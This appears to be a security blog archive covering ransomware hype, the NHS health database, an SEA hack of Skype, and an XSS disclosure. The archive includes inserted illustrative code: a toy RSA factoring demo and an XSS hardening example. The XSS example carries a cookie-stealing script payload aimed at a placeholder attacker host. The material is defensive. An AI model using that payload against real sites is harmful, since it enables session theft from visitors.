If you like this blog, or even if you just like the idea of this blog but dislike me – vote for it.
It’s independent. It has no external funding, no support from any company and owes allegiance to no-one. It’s just me and my cynicism.
I need your support. Vote for this blog: ‘most entertaining security blog’. But do it now, because voting closes tomorrow.
This is a bit worrying:
Guaranteeing security merely means you’re clueless and dangerous. But it’s indicative of the panic around CryptoLocker.
Panic, of course, is a universal life force – it gives living energy to any inanimate object. When you add panic to any story, it gains a life of its own; it grows legs and runs.
Panic has now been added to PrisonLocker (AKA PowerLocker), a new encrypting malware being readied for release by a guy called gyx.
But if you read the original and excellent exposé published last week by Malware Must Die, you cannot help but have a few questions. For example, each new announcement says release is imminent, but none of them seems to bring it any closer.
Nor does the author sound much like the traditional hacker. His command of written English is pretty good. There are relatively few typos or howling grammatical errors, and the syntax is Anglo-Saxon: he’s probably British, or at least not American. He reads like a native English speaker. He spells ‘behaviour’ with a ‘u’ (an American, or someone brought up on American English, would not), and he writes ‘created by the group “Romanian Antisec”.’ with the full stop outside the quotation marks (an American would put it inside).
So with a few questions of my own, I spoke to Fraser Howard, a security researcher with Sophos. He too was a little puzzled.
“Typically,” he explained, “ransomware falls into one of two camps. The first simply locks the user out; but data and files are not normally modified or encrypted. This is easy to deal with – once the malware is removed, the user is back to normal. It’s more of an annoyance than anything else, scaring the user into paying up.
“The second encrypts the users’ files. The ‘serious’ ransomware families do this, using cryptography correctly to securely encrypt files without leaving the key anywhere accessible. PowerLocker,” he added, “claims to do both lockout and encrypt.”
This is one of the things that puzzles him: why have both? “Seems a bit daft to me – why bother locking them out if you have encrypted their data? The author claims: ‘Even if the user is able to somehow get out of locker screen, files will still be encrypted with practically unbreakable encryption.’
Well, that’s just flawed, illogical thinking.
“It makes me suspicious – it’s indecisive. When I read claims like this, it makes me wonder if the author is actually very capable.” But that’s not all. “Some of the text in the other screenshots [from the Malware Must Die report] makes me suspect the author’s skills. Talk about ‘UAC bypass’ and ‘admin privileges’ – well, that’s all very basic stuff used by most malware today.”
My guess is that PrisonLocker was originally intended to be purely locking ransomware. Given the success and publicity surrounding CryptoLocker, gyx decided to add encryption. Not wishing to abandon what he’d already done, he kept the original locking mechanism. But with encryption now perceived as the primary sales incentive, the ‘prison’ epithet was no longer adequate, so he changed the name to ‘power’ locker (‘crypto’ locker already being taken).
But there’s one other thing we could consider. gyx is suggesting a purchase price of $100 for his malware. Firstly, he doesn’t seem intent on using it himself. Secondly, that’s remarkably cheap – unless, of course, it’s a ‘loss-leader’ being used to break into a new market.
And that, frankly, is what it seems like to me. A competent and well-educated coder has turned to the dark side, and is using this ‘project’ to get in. He understands software, but he doesn’t necessarily understand malware nor the malware marketplace. He’s selling it rather than planning to use it himself in order to stay one remove from the hacking, infecting and stealing side of malware – he sees himself more as an underworld manager than an underworld foot-soldier.
But saying all that, if PowerLocker is as good (or as bad) as he describes, then it is going to be a dangerous piece of malware. If it’s taken up by some of the better organised criminal groups with access to 0-day exploits, or simply experienced in the use of exploit kits like Magnitude, then PowerLocker could easily become the next PanicLocker.
Some time this month, if you live in Britain, you will receive a leaflet from the NHS. Its purpose is to persuade you that a new central database of all your health information (more or less everything your doctor knows about you, has said to you, has prescribed for you, or advised you on) held and operated by the government, is a good thing. It is not a good thing, and the leaflet does not tell you all you need to know about the database.
It is not a good thing.
Ross Anderson has provided an alternative leaflet providing more of the information that we should all be told. His leaflet provides a cut-out form that we can use to instruct our GP not to give any of our health data to the central database. We can do this. That’s the law. It’s in the Data Protection Act. If we do not do so, our health records will be uploaded automatically and we will not be able to get them removed. I suggest every Brit should read Anderson’s leaflet as well as the NHS leaflet; and I urge everyone to instruct their GP to block the upload.
Why do we need to object?
The data held will not be anonymised. It cannot be, because they want to marry our GP records with any records from hospital visits. That data will then be sold to third parties. The biggest buyers will be the pharmaceutical companies, either directly or disguised as research establishments or subcontracted to universities. By default, that data will not be anonymised.
They say we can insist on our own records being anonymised before sale. That is meaningless, irrelevant and impossible.
Raw medical records will not help in the development of new treatments or drugs. But it will help in targeting existing drugs. It will show relationships both geographically and socially between treatments and success or failure rates. It will, in short, enable the drug companies to target specific groups of patients or geographical areas with their existing drugs.
That will be the primary use of this database by the pharmaceutical companies – to locate targets and develop marketing strategies for their existing products.
Do not believe anything said to the contrary: this is what will happen.
The Syrian Electronic Army (SEA) yesterday hacked Skype’s WordPress and Twitter accounts. The likelihood is that the pro-Syrian group got hold of the password used by Skype’s media people, probably through its usual method of spear-phishing. My report on the incident for Infosecurity Magazine is here.
But this hack was a little different to SEA’s normal escapades. The group’s whole raison d’être is to deliver pro-Assad messages to counter what it believes is anti-Assad propaganda controlled and delivered by western governments. This is the reason that it has concentrated on attacking high-profile media companies.
Well, Skype is certainly high-profile — but the message is not ‘Syrian’. On both the Skype Twitter account and its WordPress blog the SEA message was this:
It’s a message you might more likely expect from Anonymous protesting against NSA surveillance and Microsoft complicity in that surveillance rather than a pro-Assad movement.
I asked SEA if it marked a change in its targets and tactics; and got this reply:
We can confirm that the attack was done by us, and we gained access to important documents about monitoring accounts/emails by Microsoft.
It’s still about Syria. And we will detail that soon.
So that’s the big question now: what ties Microsoft, surveillance and Syria together?
Time to rewrite the text books. We have ‘security by threat transfer’, ‘security by threat avoidance’, ‘security by threat reduction’, and ‘security by threat acceptance’.
Now I bring you the latest evolution in the theory of security risk management: security by denial…
This, ladies and gentlemen, is why we have a problem.
Wonderful idea from Deutsche Telekom. Yesterday it said it would launch a clean pipe secure service for small companies that cannot afford their own security. For a fixed monthly fee small companies will be able to access the internet via DT’s own secure data centres. “Hackers will have no chance,” said management board member Reinhard Clemens. Well, we’ll just gloss over that, and accept it at face value.
“The ‘clean pipe’ project, in which Deutsche Telekom partners with RSA – part of U.S. technology firm EMC – is in a test phase and scheduled to hit the market early next year,” reports Reuters.
So, just a little due diligence required before I sign up…
OK, Deutsche Telekom owns T-Mobile. T-Mobile “operates the fourth and fifth largest wireless networks in the U.S. market with 45 million customers and annual revenues of $21.35 billion.” (Wikipedia). Slight problem: that means that T-Mobile is subject to FISA in the US – and the US brings DT more than $20 billion a year.
OK, RSA is a huge name in encryption. That’s got to be good (even though it is, well, yes, an American company). RSA got big and very rich on its invention of public key cryptography. Thing is, RSA wasn’t first – the same ideas had already been worked out, in secret, by Ellis, Cocks and Williamson at GCHQ.
Now the details are rather obscure and still shrouded in secrecy, but there are suggestions that GCHQ told the NSA what it had discovered, and shortly after that, public key cryptography was (re)invented in the US.
I would not for one moment suggest anything underhand in the timing – but given what we now know about both the NSA and GCHQ there is a temptation to ask whether public key cryptography would have been allowed to develop if the very same mathematicians who produced it had not also discovered a way to unpick it.
Mathematicians and cryptographers tell us that cryptography based on the difficulty of factoring large semiprimes (the product of two large primes, as in RSA) is sound.
And that’s the point. But.
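To make the previous point concrete, here is an added example (not from the original post, and not anyone’s production code) of what “based on the difficulty of factoring” means in practice: a textbook RSA key is built from two primes, and the moment someone can factor the public modulus n they can recompute the private exponent d from nothing but the public key. The primes used are the real Mersenne primes 2^31 − 1 and 2^61 − 1, chosen because they are small enough for Pollard’s rho to split n in a fraction of a second; the public exponent 65537 is the conventional choice. Everything else (function names, the sample plaintext) is constructed for the demonstration.

```python
import math

# Constructed toy key: two real primes, a 31-bit and a 61-bit Mersenne prime.
# A 92-bit modulus is hopelessly small; real RSA moduli are 2048+ bits.
P = 2**31 - 1
Q = 2**61 - 1
E = 65537  # conventional public exponent


def rsa_keygen(p, q, e=E):
    """Textbook RSA: n = p*q, d = e^-1 mod (p-1)(q-1). Returns (n, e, d)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return n, e, d


def rsa_encrypt(m, n, e):
    return pow(m, e, n)


def rsa_decrypt(c, n, d):
    return pow(c, d, n)


def pollard_rho(n):
    """Return a non-trivial factor of composite n with Pollard's rho
    (Floyd cycle-finding on x -> x^2 + c mod n). Expected cost is roughly
    sqrt(smallest prime factor) steps: instant for a 31-bit prime, utterly
    infeasible for a 1024-bit one. That gap is the whole security argument."""
    if n % 2 == 0:
        return 2
    for c in range(1, 50):  # retry with a new polynomial if a cycle yields gcd == n
        x = y = 2
        d = 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:
            return d
    raise ArithmeticError("Pollard's rho failed; n may be prime")


def factor_semiprime(n):
    """Split n = p*q and return (p, q) with p < q."""
    p = pollard_rho(n)
    q = n // p
    return (p, q) if p < q else (q, p)


def recover_private_exponent(n, e):
    """An attacker holding only the public key (n, e) recovers d once n factors."""
    p, q = factor_semiprime(n)
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    n, e, d = rsa_keygen(P, Q)
    c = rsa_encrypt(12345, n, e)
    d_attacker = recover_private_exponent(n, e)
    print("factoring recovered the primes:", factor_semiprime(n) == (P, Q))
    print("attacker's d matches the real d:", d_attacker == d)
    print("ciphertext decrypted with recovered key:", rsa_decrypt(c, n, d_attacker))
```

The same code run against a 2048-bit modulus would never return from `pollard_rho`: nothing in the mathematics changes between the toy key and a real one except the size of the primes, which is exactly why the soundness of RSA is a statement about how hard factoring is, and nothing more.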
Thank you NSA. Thank you GCHQ. You have reduced a wonderful and exciting internet into something dirty and distrustful. Thank you for removing any possibility of trust anywhere.
Have you ever wondered why we hear of a new hack every day? Well, here’s one reason – the arrogance and denial of some of our security managers.
A couple of months back I was speaking to Ilia Kolochenko, the CEO of a pentesting firm called High Tech Bridge. I asked him if pentesting was really necessary. Well, he said, just this morning I found flaws in [several high-profile media websites] that could, if cleverly exploited, lead to the complete owning of the networks concerned.
Needless to say I was interested. I asked him if he could find more, and laid down a few conditions to ensure that these weren’t old vulnerabilities that he already knew about. He delivered the goods, and the full story was published in Infosecurity Magazine: Infosecurity Exclusive: Major Media Organizations Still Vulnerable Despite High Profile Hacks.
Before publishing the story, all of the companies were notified and given a period of time to correct the flaws. Here’s a sample of the notifications:
Last week I accidentally found an XSS vulnerability on your website that makes it possible to steal visitors’ sensitive information (e.g. cookies or browsing history), perform phishing attacks and do many other nasty things… [details of the flaw and proof]
Please forward this information to your IT security team, so they can fix it. They may contact me should they need additional information and/or any assistance – I will be glad to help.
In some cases, where no vulnerability reporting address could be found, this or similar was sent to as many addresses as could be found.
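The notification above talks about stealing cookies and mounting phishing attacks through a cross-site scripting flaw. As an added illustration (not code from the article, from High Tech Bridge, or from any of the sites involved, and with a constructed request against a hypothetical search page), here is the shape such a flaw usually takes and the two fixes a security team would be expected to make: encode untrusted input before reflecting it into HTML, and mark the session cookie `HttpOnly` so that script cannot read it even if an XSS slips through. The sample payload is a classic cookie-stealer pointed at a placeholder hostname.

```python
import html
from urllib.parse import parse_qs

# Constructed sample request: a reflected-XSS payload in the search parameter,
# decoding to  <script>new Image().src="http://attacker.example/c?"+document.cookie</script>
# "attacker.example" is a placeholder, not a real host.
SAMPLE_QUERY = (
    "q=%3Cscript%3Enew+Image().src%3D%22http%3A//attacker.example/c%3F%22"
    "%2Bdocument.cookie%3C/script%3E"
)


def get_param(query_string, name):
    """Return the first value of a query-string parameter, or '' if absent."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string):
    """'Before': the search term is reflected into the page verbatim.
    Whatever the visitor was lured into requesting runs as the site's own script,
    which is what makes the cookie theft and on-domain phishing possible."""
    term = get_param(query_string, "q")
    return f"<h1>Results for: {term}</h1>"


def render_hardened(query_string):
    """'After': the term is HTML-encoded, so <, >, & and quotes are displayed,
    not interpreted. The browser shows the payload as text instead of running it."""
    term = get_param(query_string, "q")
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"


def session_cookie_header(value, hardened=True):
    """Set-Cookie header for the session. HttpOnly removes the cookie from
    document.cookie, so the payload above gets nothing even if it does execute;
    Secure and SameSite are the other flags a reviewer would look for."""
    flags = "; Secure; HttpOnly; SameSite=Lax" if hardened else ""
    return f"Set-Cookie: session={value}; Path=/{flags}"


def contains_raw_script(markup):
    """Crude detector used to compare the two renderings: an un-encoded <script tag."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_QUERY))
    print("hardened:  ", render_hardened(SAMPLE_QUERY))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding is the actual fix; the cookie flags are defence in depth, and a partial fix of the kind described next (a blacklist that catches one payload and misses the next) is exactly what this comparison is meant to rule out: the hardened version does not try to recognise the attack at all, it simply never emits untrusted text as markup.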
Point one. Only one of the companies replied to the notification emails. This company basically said, thank you, fixed it. In reality it was only partly fixed and easily bypassed. So at the time of publishing the story, all of the websites had been contacted and given time to fix the flaw – but none of them had.
Point two. Shortly after publishing the story I received the following comments from one of the featured companies:
However, try as I might, I have found no-one at xyz inc who has ever heard of or from Mr Kolochenko, or yourselves, regarding any testing of our systems, vulnerabilities found, or in fact comments upon our security. Could you therefore please forward me [a copy of the several emails we had already sent].
Needless to say we did this, including an automated receipt email that proved that xyz inc had been sent and had received the email.
This head of xyz’s security then went on to accuse me of writing an advertorial for Kolochenko. He added,
…the vast majority of reported attacks on media broadcasters and press organisations so far in 2013 have had nothing to do with external attacks on websites or online presence, and the Syrian Electronic Army in particular have never used this attack vector – every one of their successful breaches has been the result of a phishing attack, which Mr Kolochenko’s tools will do nothing whatsoever to obviate.
This, of course, is both wrong and irrelevant – how the SEA’s preference for phishing (which could have been made easier by exploiting this vulnerability anyway) somehow protects xyz inc is beyond me.
The simple fact is this head of security was more concerned with deflecting any blame from himself, denying any vulnerability in his system and accusing me of lacking professional standards than in actually finding and fixing said vulnerability. A little humility and acceptance of help from security researchers might go a long way to making the internet a safer place.
Postscript. Following publication of the article, the websites in question fixed the flaws. As far as xyz inc is concerned, Ilia subsequently received a further email:
We have now pushed out a fix for this vulnerability. Thanks very much for bringing this to our attention.